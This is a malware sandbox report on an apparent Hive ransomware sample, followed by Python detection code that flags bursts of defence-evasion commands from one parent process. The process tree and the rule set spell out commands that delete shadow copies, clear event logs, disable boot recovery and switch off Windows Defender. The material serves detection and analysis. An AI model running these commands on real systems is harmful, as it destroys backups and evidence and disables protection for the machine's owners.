C:\Windows\system32\vssadmin.exevssadmin.exe delete shadows /all /quiet2⤵
- Interacts with shadow copies
PID:1124 -
C:\Windows\system32\wevtutil.exewevtutil.exe cl system2⤵
- Suspicious use of AdjustPrivilegeToken
PID:1836 -
C:\Windows\system32\wevtutil.exewevtutil.exe cl security2⤵
- Suspicious use of AdjustPrivilegeToken
PID:1780 -
C:\Windows\system32\wevtutil.exewevtutil.exe cl application2⤵
- Suspicious use of AdjustPrivilegeToken
PID:1792 -
C:\Windows\System32\Wbem\wmic.exewmic.exe SHADOWCOPY /nointeractive2⤵
- Suspicious use of AdjustPrivilegeToken
PID:1520 -
C:\Windows\System32\Wbem\wmic.exewmic.exe shadowcopy delete2⤵
- Suspicious use of AdjustPrivilegeToken
PID:1104 -
C:\Windows\system32\bcdedit.exebcdedit.exe /set {default} bootstatuspolicy ignoreallfailures2⤵
- Modifies boot configuration data using bcdedit
PID:2064 -
C:\Windows\system32\bcdedit.exebcdedit.exe /set {default} recoveryenabled no2⤵
- Modifies boot configuration data using bcdedit
PID:2088 -
C:\Windows\system32\cmd.execmd.exe /c "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All2⤵PID:2108
-
C:\Program Files\Windows Defender\MpCmdRun.exe"C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All3⤵
- Deletes Windows Defender Definitions
PID:2128 -
C:\Windows\system32\cmd.execmd.exe /c powershell Set-MpPreference -DisableIOAVProtection $true2⤵PID:2140
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Set-MpPreference -DisableIOAVProtection $true3⤵
- Suspicious behavior: EnumeratesProcesses
PID:2160 -
C:\Windows\system32\cmd.execmd.exe /c powershell Set-MpPreference -DisableRealtimeMonitoring $true2⤵PID:2228
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Set-MpPreference -DisableRealtimeMonitoring $true3⤵
- Suspicious behavior: EnumeratesProcesses
PID:2248
-
C:\Windows\system32\NOTEPAD.EXE"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\Desktop\SyncClear.txt1⤵
- Opens file in notepad (likely ransom note)
PID:2388
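Taken one at a time, most of the commands in the tree above are things an administrator might legitimately run (a single reg add under the Defender policy key, one schtasks /Disable). What marks this sample is the burst: policy tampering, service Start=4, scheduled-task disabling, autorun removal, definition removal, Set-MpPreference, shadow-copy deletion, event-log clearing and bcdedit all issued from one parent within seconds. The detection logic below is an added example, not part of the sandbox report or of any vendor rule set: it classifies process-creation command lines into those categories and flags a parent whose children cover several of them. The event records are constructed from the command lines in the tree; the Sysmon-style field names and the parent PIDs (1000 for the sample, 1234 for the shell that opened notepad) are assumptions, since this section of the report does not show parent PIDs.

```python
"""Command-line burst detection for the defence-evasion sequence in this
Hive sample's process tree.  Added example, not part of the sandbox report.
Events are constructed from the tree above; field names and parent PIDs
are assumptions."""
import re
from collections import defaultdict

# (category, regex applied to the lower-cased command line)
RULES = [
    ("defender_policy_tamper",
     re.compile(r'reg(\.exe)?\s+add\s+"?hklm\\software\\policies\\microsoft\\windows defender\\[^"]+"?\s+/v\s+')),
    ("defender_service_disabled",
     re.compile(r'reg(\.exe)?\s+add\s+"?hklm\\system\\currentcontrolset\\services\\'
                r'(wdboot|wdfilter|wdnisdrv|wdnissvc|windefend|securityhealthservice)"?\s+/v\s+"?start"?\s.*\s/d\s+"?4"?')),
    ("defender_autologger_off",
     re.compile(r'wmi\\autologger\\defender(api|audit)logger"?\s+/v\s+"?start"?\s.*\s/d\s+"?0"?')),
    ("defender_task_disabled",
     re.compile(r'schtasks(\.exe)?\s+/change\s+/tn\s+"?microsoft\\windows\\(windows defender|exploitguard)\\.*\s/disable')),
    ("defender_autorun_removed",
     re.compile(r'reg(\.exe)?\s+delete\s+.*(\\run"?\s+/v\s+"?windows ?defender"?|contextmenuhandlers\\epp)')),
    ("defender_definitions_removed",
     re.compile(r'mpcmdrun(\.exe)?"?\s+-removedefinitions\s+-all')),
    ("defender_preference_disabled",
     re.compile(r'set-mppreference\s+-disable\w+\s+\$true')),
    ("shadow_copies_deleted",
     re.compile(r'(vssadmin(\.exe)?\s+delete\s+shadows|wmic(\.exe)?\s+shadowcopy\s+delete)')),
    ("event_logs_cleared",
     re.compile(r'wevtutil(\.exe)?\s+cl\s+(system|security|application)')),
    ("recovery_inhibited",
     re.compile(r'bcdedit(\.exe)?\s+/set\s+\{default\}\s+(recoveryenabled\s+no|bootstatuspolicy\s+ignoreallfailures)')),
]

# Constructed process-creation events (subset of the tree above).  ParentProcessId
# values are assumed: 1000 = the sample, 1234 = the shell that opened notepad.
SAMPLE_EVENTS = [
    {"ParentProcessId": 1000, "ProcessId": 892,  "CommandLine": r'reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f'},
    {"ParentProcessId": 1000, "ProcessId": 1160, "CommandLine": r'reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f'},
    {"ParentProcessId": 1000, "ProcessId": 1092, "CommandLine": r'reg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f'},
    {"ParentProcessId": 1000, "ProcessId": 876,  "CommandLine": r'schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable'},
    {"ParentProcessId": 1000, "ProcessId": 1016, "CommandLine": r'reg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "Windows Defender" /f'},
    {"ParentProcessId": 1000, "ProcessId": 1908, "CommandLine": r'reg.exe delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f'},
    {"ParentProcessId": 1000, "ProcessId": 1764, "CommandLine": r'reg.exe add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f'},
    {"ParentProcessId": 1000, "ProcessId": 1124, "CommandLine": r'vssadmin.exe delete shadows /all /quiet'},
    {"ParentProcessId": 1000, "ProcessId": 1520, "CommandLine": r'wmic.exe SHADOWCOPY /nointeractive'},
    {"ParentProcessId": 1000, "ProcessId": 1780, "CommandLine": r'wevtutil.exe cl security'},
    {"ParentProcessId": 1000, "ProcessId": 2088, "CommandLine": r'bcdedit.exe /set {default} recoveryenabled no'},
    {"ParentProcessId": 1000, "ProcessId": 2108, "CommandLine": r'cmd.exe /c "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All'},
    {"ParentProcessId": 1000, "ProcessId": 2228, "CommandLine": r'cmd.exe /c powershell Set-MpPreference -DisableRealtimeMonitoring $true'},
    {"ParentProcessId": 1234, "ProcessId": 2388, "CommandLine": r'"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\Desktop\SyncClear.txt'},
]


def classify(command_line):
    """Return the category names (in RULES order) matched by one command line."""
    lowered = command_line.lower()
    return [name for name, rx in RULES if rx.search(lowered)]


def score_parent(events, threshold=4):
    """Group matches by parent PID and return {ppid: sorted categories} for
    parents whose children cover at least `threshold` distinct categories.
    One reg add is noise; four categories from one parent is the burst."""
    hits = defaultdict(set)
    for ev in events:
        for name in classify(ev["CommandLine"]):
            hits[ev["ParentProcessId"]].add(name)
    return {ppid: sorted(cats) for ppid, cats in hits.items() if len(cats) >= threshold}


if __name__ == "__main__":
    for ppid, cats in score_parent(SAMPLE_EVENTS).items():
        print(f"parent {ppid}: {len(cats)} evasion categories -> {', '.join(cats)}")
```

The enumeration-only `wmic.exe SHADOWCOPY /nointeractive` is deliberately not matched, only the `shadowcopy delete` that follows it, and the notepad launch that opens the ransom note is not matched either; both stay out of the flagged set, which for the constructed events contains only the sample's PID with all ten categories. When feeding real Sysmon EID 1 or Security 4688 data, group additionally by a time window (the sandbox ran this whole sequence inside its 104 s budget) so that unrelated administrative reg.exe calls hours apart do not accumulate.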
Network
MITRE ATT&CK Enterprise v6
Downloads
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
MD5 9ad30b90d95b927865dcb9b5f08378f4
SHA1 fbef6c732e0bee170b0bdb364a9067d0f1bd7432
SHA256 b0ee39302e0fb658a806cbef819b6e3a3334cd15220993a8865380ebcef47b2f
SHA512 78e2834d7494f289a371ae01ddf7d794a506748f718e6d0b678a4cf24496246fe92c6dcce12c3b9c5df5c4c55aabc91e2a7ec57109a85a529a8477223c0bf40d